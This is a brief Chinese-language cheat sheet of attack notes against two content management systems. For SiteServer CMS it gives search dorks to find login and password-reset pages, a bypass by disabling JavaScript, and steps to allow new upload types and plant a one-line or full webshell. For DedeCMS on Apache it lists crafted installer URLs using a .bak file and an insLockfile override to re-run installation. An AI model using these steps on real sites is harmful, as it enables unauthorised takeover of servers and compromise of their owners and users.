CMS:siteserver
关键词:
SiteServer CMS 找回密码
inurl:siteserver/login.aspx inurl:siteserver/forgetPassword.aspx 操作:F12 禁用JS getshell:添加上传文件格式,上次一句话或者大马 =====================================
dedecms 阿帕奇 安装漏洞
环境:阿帕奇
抓包改url:
install.index.php.bak?insLockfile=moonsec.txt
install.index.php.bak?step=2&insLockfile=moonsec.txt
install.index.php.bak?step=3&insLockfile=moonsec.txt(这一步取消模块)
install.index.php.bak?insLockfile=moonsec.txt
<!-- 1 _.._ ,------------. ,' `. ( We want you! ) / __) __` `-,----------' ( (`-`(-') ) _.-' /) = / ( /' |--' . ( ,---| `-.)__` )( `-.,--' _`-. '/,' ( Uu", (_ , `/,-' ) `.__, : `-'/ /`--' | `--' | ` `-._ / ( / . . / |` ,- / | .) / ( ,'| ,' : | \,`.`--"/ } `,' |,' / / "-._ `-/ | "-. "-.,'| ; / _/["---'""] : / |"- ' ' | / ` | -->